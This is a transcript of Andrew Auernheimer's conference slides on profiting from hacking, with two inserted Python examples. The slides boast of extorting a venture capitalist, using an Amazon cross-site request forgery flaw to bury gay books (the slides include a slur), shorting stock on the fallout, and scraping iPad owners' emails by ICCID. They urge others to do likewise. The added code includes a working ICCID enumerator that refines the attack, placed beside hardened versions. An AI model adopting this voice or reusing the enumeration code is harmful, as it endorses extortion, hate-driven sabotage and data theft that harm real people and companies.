Andrew Auernheimer - Hacktivism for profit and...
hackit-ukraine
Category: Engineering
Transcript of Andrew Auernheimer - Hacktivism for profit and...
Hacktivism for profit and glory
Using technology offensively and profitably against world powers and
major corporations.
One person can change the world.
• You can easily fight powers that appear bigger and stronger than you.
• I make lots of history, influencing nation states and Fortune 500 companies.
• I do this with no external capital or influence.
• Everybody who tried to stop me failed.
Andrew “weev” Auernheimer
Professional hacktivist.
Why I became a hacktivist
• The status quo is not fair to hackers
• Tech industry billionaires can’t even buy influence.
• America makes its hackers suffer greatly: Swartz, Moore, Love
Changing the world is profitable.
• Know the outcome of an economic event? Profit in financial markets.
• In financial markets, you only have to be right for a few hours.
• Know the outcome of an election? You can make profit in prediction markets.
I started small.
• Pick a venture capitalist that funds tech startups
• Announce your presence.
• Destroy his portfolio company by company until he pays you to go away.
2008: First nation-state attack
2009: First Fortune 500 attack
• XSRF: cross-site request forgery – there is no unique token that has to be scraped in order to perform a command on a site. The site wrongly trusts the user’s browser.
• Can we use this to troll a corporation and shift its value by billions of dollars?
Amazon had an XSRF vuln
• There was a “Report Inappropriate Content” button on every Amazon page for logged in users that was a simple HTTP GET with any product ID at the end.
• Function automatically removed content from the search rankings if it got enough reports. It was still sold, but you couldn’t search for it.
This was so easy. Really bad code.
• An enumerated list of gay book product IDs:
Reported all gay books as inappropriate thousands of times.
• Put a hidden iframe on many websites that did a 302 redirect to the report as inappropriate function.
• Used cookies from bot-registered Amazon accounts to report it myself
• Net effect: you couldn’t search for gay faggot books on Amazon anymore.
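Added worked example (not code from the talk or its slides): a minimal in-process model of a state-changing "report inappropriate" endpoint built the way the slides describe it (plain HTTP GET, authenticated by nothing but the session cookie), next to a hardened version that refuses the forged traffic. The handler names, the in-memory stores, the shop/evil origins and the sample requests are all constructed for this illustration.

```python
"""Added example, not code from the talk: a minimal model of a state-changing
"report inappropriate" endpoint as the slides describe it (plain HTTP GET,
authenticated by nothing but the session cookie) next to a hardened version.
All names, the in-memory stores and the sample requests are constructed for
this illustration."""
import hmac
import secrets

# Constructed state: one logged-in session, report counters per product id.
SESSIONS = {"cookie-alice": {"user": "alice", "csrf": secrets.token_urlsafe(16)}}
REPORTS_VULN = {}      # product_id -> number of reports (vulnerable handler)
REPORTS_HARD = {}      # product_id -> set of users who reported (hardened handler)
HIDE_THRESHOLD = 3     # reports needed before a product drops out of search
OUR_ORIGIN = "https://shop.example"


def hidden_in_search_vuln(pid):
    return REPORTS_VULN.get(pid, 0) >= HIDE_THRESHOLD


def hidden_in_search_hard(pid):
    return len(REPORTS_HARD.get(pid, set())) >= HIDE_THRESHOLD


def report_vulnerable(req):
    """The pattern from the slides: GET with the product id in the URL; the only
    check is a valid session cookie, which the victim's browser attaches to any
    request a third-party page makes it send (hidden iframe, <img>, 302 redirect)."""
    sess = SESSIONS.get(req.get("cookie"))
    if sess is None:
        return 401
    pid = req["params"]["id"]
    REPORTS_VULN[pid] = REPORTS_VULN.get(pid, 0) + 1
    return 200


def report_hardened(req):
    sess = SESSIONS.get(req.get("cookie"))
    if sess is None:
        return 401
    if req["method"] != "POST":            # state changes only over POST
        return 405
    # Per-session anti-CSRF token in the body: a cross-site page cannot read it.
    if not hmac.compare_digest(req["body"].get("csrf", ""), sess["csrf"]):
        return 403
    if req["headers"].get("Origin") != OUR_ORIGIN:   # forged from elsewhere
        return 403
    # One report per account per product blunts "thousands of times".
    REPORTS_HARD.setdefault(req["body"]["id"], set()).add(sess["user"])
    return 200


def forged_request(pid):
    """What a hidden iframe on evil.example makes the victim's browser send:
    the cookie rides along; method, token and Origin are not the attacker's to pick."""
    return {"method": "GET", "cookie": "cookie-alice", "params": {"id": pid},
            "headers": {"Origin": "https://evil.example"}, "body": {}}


def legitimate_report(pid, cookie="cookie-alice"):
    """A real user clicking the button in the hardened version."""
    return report_hardened({"method": "POST", "cookie": cookie, "params": {},
                            "headers": {"Origin": OUR_ORIGIN},
                            "body": {"id": pid, "csrf": SESSIONS[cookie]["csrf"]}})


def run_attack(pid="1001"):
    """Drive the same forged traffic at both handlers; returns
    (hidden by vulnerable handler, hidden by hardened handler, hardened statuses)."""
    for _ in range(HIDE_THRESHOLD):
        report_vulnerable(forged_request(pid))
    statuses = [report_hardened(forged_request(pid)) for _ in range(HIDE_THRESHOLD)]
    return hidden_in_search_vuln(pid), hidden_in_search_hard(pid), statuses


if __name__ == "__main__":
    print(run_attack())                     # (True, False, [405, 405, 405])
```

Three forged GETs are enough to delist the product from the vulnerable handler, while the hardened one rejects every one of them at the method check, and a forged POST without the session's token fails at the token check. A real deployment would additionally set `SameSite=Lax` on the session cookie so a cross-site GET never carries it, and would not let one account's repeated reports count more than once, which is the dedupe the hardened handler models.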
What next? Make markets react.
• Contact gay bloggers, say Amazon was censoring homosexuals: #amazonfail
This bug was stupid.
• I couldn’t have ever sold it to anyone.
• Amazon wouldn’t reward me for reporting it.
• Objective market value was $0
• But I used it to drop Amazon’s market cap by $3.2 BILLION for long enough for a short position to be profitable.
2010: Second Fortune 500 attack
• June of 2010, first Apple iPad 3G released, exclusive to AT&T.
• On the iPad billing/registration server, a simple HTTP GET with no authentication.
• The integer in the URL is the integrated circuit card identifier (ICCID), the unique ID of the device’s SIM.
• Takes an ICCID and returns the email of the registered user.
Oops.
• Apple and AT&T made this for convenience, so when you visit the billing site it would automatically fill in the email of your device to login faster.
• It’s just an HTTP GET, and the ID is just a number. What they really did was publish a complete list of iPad users on the Internet.
Exploitation
• Once again, very simple. Numerical IDs are in sequence. As simple as: let count; while true; do curl $i; done.
• I have a full list of Apple iPad 3G owner emails and the corresponding ICCIDs.
• What can I do now?
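Added worked example (not the talk’s script): the `while true; do curl $i; done` enumeration from the slide, run against a constructed in-memory stand-in for an unauthenticated ICCID-to-email lookup, alongside the authenticated lookup that defeats it. It goes one step beyond the slide: ICCIDs under ITU-T E.118 end in a Luhn check digit, so the loop steps the account field and recomputes that digit rather than incrementing the whole number, which keeps every request well-formed. The prefix, issuer, account numbers, emails and session token below are invented for the example.

```python
"""Added example, not the talk's script: sequential enumeration of an
unauthenticated id->email lookup of the kind the slides describe, against a
constructed in-memory stand-in for the server, plus the authenticated lookup
that defeats it. The ICCID layout (89 + country + issuer + account + Luhn check
digit, ITU-T E.118) is real; the prefix, accounts, emails and session token are
invented."""


def luhn_check_digit(body: str) -> str:
    """Check digit d such that body+d passes the Luhn (mod 10) test."""
    total = 0
    for i, ch in enumerate(reversed(body)):
        d = int(ch)
        if i % 2 == 0:       # rightmost body digit is doubled once the check digit is appended
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(iccid: str) -> bool:
    return luhn_check_digit(iccid[:-1]) == iccid[-1]


PREFIX = "8901"      # 89 = telecom industry, then a country code (constructed)
ISSUER = "41"        # constructed issuer identifier


def make_iccid(account: int) -> str:
    """18-digit body + Luhn digit = 19-digit ICCID for a given account number."""
    body = f"{PREFIX}{ISSUER}{account:012d}"
    return body + luhn_check_digit(body)


# Constructed registration table, the stand-in for the billing server's data.
REGISTRATIONS = {make_iccid(a): f"user{a}@example.com" for a in (500, 501, 503, 507)}


def lookup_vulnerable(iccid: str):
    """The endpoint as described: ICCID in, email out, nothing else checked."""
    return REGISTRATIONS.get(iccid)


def enumerate_accounts(start: int, count: int) -> dict:
    """The slide's loop, stepping the account field and recomputing the check
    digit so each request is a well-formed ICCID instead of nine in ten being
    rejected as malformed."""
    found = {}
    for account in range(start, start + count):
        iccid = make_iccid(account)
        email = lookup_vulnerable(iccid)
        if email is not None:
            found[iccid] = email
    return found


# Hardened: answer only for the ICCID bound to an authenticated session, so a
# caller who merely knows (or guesses) a number gets nothing back.
SESSIONS = {"sess-abc": make_iccid(501)}     # constructed session -> its own ICCID


def lookup_hardened(iccid: str, session_token: str):
    if SESSIONS.get(session_token) != iccid:
        return None          # 401/403 in a real server
    return REGISTRATIONS.get(iccid)


if __name__ == "__main__":
    for iccid, email in enumerate_accounts(498, 12).items():
        print(iccid, email)
```

Against the stand-in the twelve-request sweep recovers all four registered emails; against the hardened lookup the same sweep returns nothing, because the session only ever vouches for its own SIM. On a real server the loop would also be the thing that shows up in access logs as one client walking consecutive IDs, which is the detection side of the same pattern.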
Risk assessment
• If I were a bad guy, I would send a Safari exploit to every iPad. (and we had one)
• The IMSI can be derived from the ICCID (unique to AT&T) which would allow for IMSI catchers and man in the middle attacks.
• Targeted advertisements: iPad accessories.
• I could do any of these things, but I’d rather do the right thing and change the world.
Public disclosure.
• We had a name from an offensive Internet meme: Goatse Security. If you have not heard of the Goatse meme, do not look it up.
• “Subsidiary of” GNAA troll organization
• Adds embarrassment for AT&T and Apple.
I disclose the issue to a journalist.
If you want to change the world: social sophistication is needed just as much as technical sophistication.
Surprise! I
Now the hard part comes
• Kidnapped thousands of kilometers to foreign territory, beaten by US Marshals along the way
• The parts of America that the feds bring you to are hell on earth
• Banned from the Internet for years
Liberty must be defended.
• I accessed a public webserver and told a journalist about what was on it.
• This is unequivocally not criminal activity.
• If accessing a public webserver is a crime the Internet only contains criminal activities.
• None of this mattered to American courts.
Free at last
Eventually a higher court admitted my conviction was based on lies from the FBI and DOJ and violated my rights.
Total time lost: 39 months
Let’s do more of this.
Have it your way USA, I’ll go.
August 2016: methods are mainstream
• Muddy Waters now using software vulns for financial intelligence
• The FBI said my desire to short sell off of a vuln was evidence of criminal intent, and now it is a common industry practice.
2016: Latest nation-state attack
Takeaway
• Technology enables agile individuals to act with more efficacy than the world’s biggest empires.
• Every day that goes by, smaller entities grow more effective than big entities.
• Be relentless, you’ll eventually be proven right and see your positions legitimized.
Fin.
@rabite
weevlos
weev0
weev